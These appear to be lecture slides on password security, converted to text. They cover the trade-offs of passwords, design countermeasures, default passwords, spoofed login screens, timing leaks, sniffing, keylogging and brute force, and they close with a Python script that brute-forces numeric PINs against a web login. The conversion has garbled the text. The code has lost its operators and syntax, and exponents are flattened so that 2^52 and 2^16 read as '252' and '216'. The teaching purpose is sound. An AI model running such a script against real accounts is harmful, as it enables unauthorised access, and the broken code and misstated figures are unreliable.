Security of Password-protected systems

1
Security of Password-protected systems

• Authentication means checking who is using your
  system. Password and PIN-based systems have
  become very popular, as these are easy and cheap
  to design and use compared to the alternatives.
  Very many systems use passwords. Even if better
  approaches exist, passwords will be used for many
  years to come. Someone responsible for systems
  security is likely to want to achieve the best
  performance from this kind of system.

2
Advantages to System Operator 1

• Users don't need to carry physical tokens.
  Passwords are based on what the users know.
• Passwords don't require special hardware.
  Providing special hardware for all the computers
  in an organisation, or for all system users is
  expensive.
• Having a password to get into something
  provides a boundary where those not authorised
  are almost certain to go away. Coming to a locked
  door that could be forced has a similar effect.
• If a password is difficult to remember, the
  cost of remembering it is carried by the user, as
  opposed to the system provider.

3
Advantages to System Operator 2

• If a user forgets a password, reissue could be
  automated, e.g. if you know the email address of
  the user. If this can't be automated, the
  reissuing cost can still be charged to the user
  in some cases.
• For systems requiring greater security,
  passwords can be a multi-factor authentication
  system component. E.G. such a system might
  require both a password and a one-time number
  sent as a SMS message to the users mobile.
• A password system can be software upgraded
  without requiring hardware changes.

4
Disadvantages 1

• People choose passwords which are easy to
  guess. Reissue hints based on Mother's maiden
  name are as bad.
• Shoulder surfing, mobile phone and other video
  cameras ...
• For someone who hides their fingers, keyboards
  can usually be modified anyway ...
• People have to remember too many passwords, so
  are likely to write them down, or use the same
  password in many different systems.

5
Disadvantages 2

• When someone with access to your password in
  one system finds out or guesses which other
  online systems you use, they have a very good
  chance of getting into these other systems.
• When there are very many system using
  passwords, there are too many insiders able to
  discover a password used on many systems.
• People find it difficult to input a long and/or
  complex password without making errors.

6
Design improvements 1

• The design and implementation cost for these
  precautions is small, but they impact usability
  for some people
• Not echoing the password when it is input on a
  screen. This trades off against poor typing
  skills of some users who find accurate data entry
  difficult.
• Choosing the password for the user, rather than
  allowing the user to choose it. This increases
  unpredictability and forget-ability.
• Forcing password changes, e.g. monthly or
  yearly. This also increases the probability a new
  password will be forgotten. It reduces risk of
  password being used by attacker and the duration
  of an open exploit.

7
Design improvements 2

• Hashing the password as stored on system and
  when input using a one way scrambling algorithm.
  This protects plain text passwords to some
  extent. It makes it impossible to reissue the
  same password if the user forgets it. A slow
  hashing algorithm can be chosen.
• Locking out a user account after a certain
  number of failed attempts. This can defeat
  guessing of the most popular passwords, e.g. name
  of spouse or football team, but risks locking out
  users with clumsy typing. Also risks a denial of
  service attack, e.g. if the only accounts used to
  login to a remote server are periodically
  attacked over the Internet.
• Making user account names unpredictable. This
  protects the secret password with an obscure
  username. The trade off is that the username is
  more likely to be forgotten.

8
Default passwords

• If you are designing a system to manufacture or
  distribute (e.g. via CD-ROM or software download)
  to users you might have to set the initial system
  administration passwords. It will be cheaper if
  all initial passwords are the same.
• A better approach will require the installer to
  choose a password when using the installation
  program, or perhaps for a broadband router to
  have its password set to the serial number of the
  router - so long as the IP address of the
  installation is unknown to the distributor and
  use of the serial number to login is not made
  accessible by default for the external network
  interface.
• There is a conflict of interest, in that
  manufacturers and distributors want to minimise
  support costs.

9
Who loses if it breaks ?

• A student who leaves his password written down in
  an empty room might lose data, or more likely its
  confidentiality. This provides an incentive to
  keep the password secret.
• Users who are unlikely to be affected are more
  likely to compromise good practice in pursuit of
  convenience. Having Bob Cracker impersonate Alice
  Scholar affects other user's interests through
  use of Alice's account to attack connected
  systems. If discovered the attack will be blamed
  on Alice. On a system where all you need to get
  an account is an email address on another system,
  there is little incentive to protect the
  credentials.
• If a privilege escalation attack can be launched,
  Bob only needs to break the security on one
  account out of thousands, so in this situation
  everyone who uses this network could lose if only
  one account is vulnerable.

10
The bogus system

• How do you know when you input a password to a
  system, that the system isn't bogus ?
• Windows XP requires use of the control, alt and
  del keys prior to inputting a password, and makes
  it difficult to create an application which will
  trap this key combination. This doesn't prevent
  someone from booting another operating system
  from CD and presenting a password input sequence
  which looks just like Windows XP.
• This attack keeps getting repeated in new
  contexts - e.g. thieves installing bogus ATMs to
  skim credit cards and PINs.

11
Variable response delays

• This is similar to the old bicycle combination
  lock
• attack that relies on differences in feel of
  each of 4
• rotors as its open point is passed. If the
  delay in
• getting a "wrong password" message depends upon
  which character position tests wrong, this gives
  an
• attacker opportunities to get each of 8
  characters in a password right before trying the
  others, greatly
• reducing the number of failed attempts needed.

12
Passing plaintext passwords over the wire

• If a users credentials on a client are passed to
  a server over the network connection, security of
  this system depends upon preventing someone from
  sniffing the wire. Early versions of Sun's
  Network File System and Microsoft's similar SMB
  protocol are vulnerable. These old configurations
  persist much longer than the replacement
  technology is available for various reasons.

13
Keylogging

• If the keys all sound exactly the same or draw
  exactly the same current from the power supply,
  or if an attacker only has network access to a
  system with a keyboard, it could still be
  possible for an attacker to install a program
  that logs the keystrokes. Then again the keyboard
  usually looks standard and could be replaced with
  one that looks the same but isn't.

14
Brute force

• A system that will defeat a casual user who
  inputs passwords manually might be easily
  defeated by a script that simulates a user.
  Programs such as wget are designed to be able to
  automate any HTTP request.
• A 4 digit PIN protected system only requires a
  loop to run 10,000 times - though 4 digit PINs
  tend not to start with a '0', reducing the
  keyspace to 9,000. The best possible 8 digit
  passwords using any of 96 easily input characters
  allow for 252 combinations. If the hash file is
  available, this number is subject to attack using
  a network of new computers and a few days to run
  through all the possible passwords.
• In practice few actual passwords are chosen from
  such a large set. A password which is in a
  spelling dictionary might be broken in less than
  216 attempts.

15
Brute force attack script part 1

• !/bin/env python
• script to brute force crack a web application
  using
• numeric PINs by trying all of these in a range
• userraw_input("username of account to attack")?
• startpinint(raw_input("start PIN in range to
  attack e.g. 1000"))?
• endpinint(raw_input("end PIN in range to attack
  e.g. 9999"))?
• urlraw_input("URL of web application to
  attack")?
• for pin in range(startpin,endpin)
• do_post(user,pin,url)?

16
Brute force attack script part 2

• def do_post(user,pin,url)
• ''' perform a single web authentication
  request, by doing a HTTP post operation on web
  server, and reports pass .
• This is based upon whether the result contains
  known error string (for a fail) or not (for a
  pass) '''
• import urllib2
• postdata'?PINsusers' (str(pin),user)?
• req urllib2.Request(urlurl,datapostdata)?
• fr urllib2.urlopen(req)?
• resultfr.read()?
• if result.find('Incorrect account or PIN') gt
  0
• failed to login if error returned
• pass
• else
• print 'cracked PIN d\n account s\n url
  s' (pin,user,url)?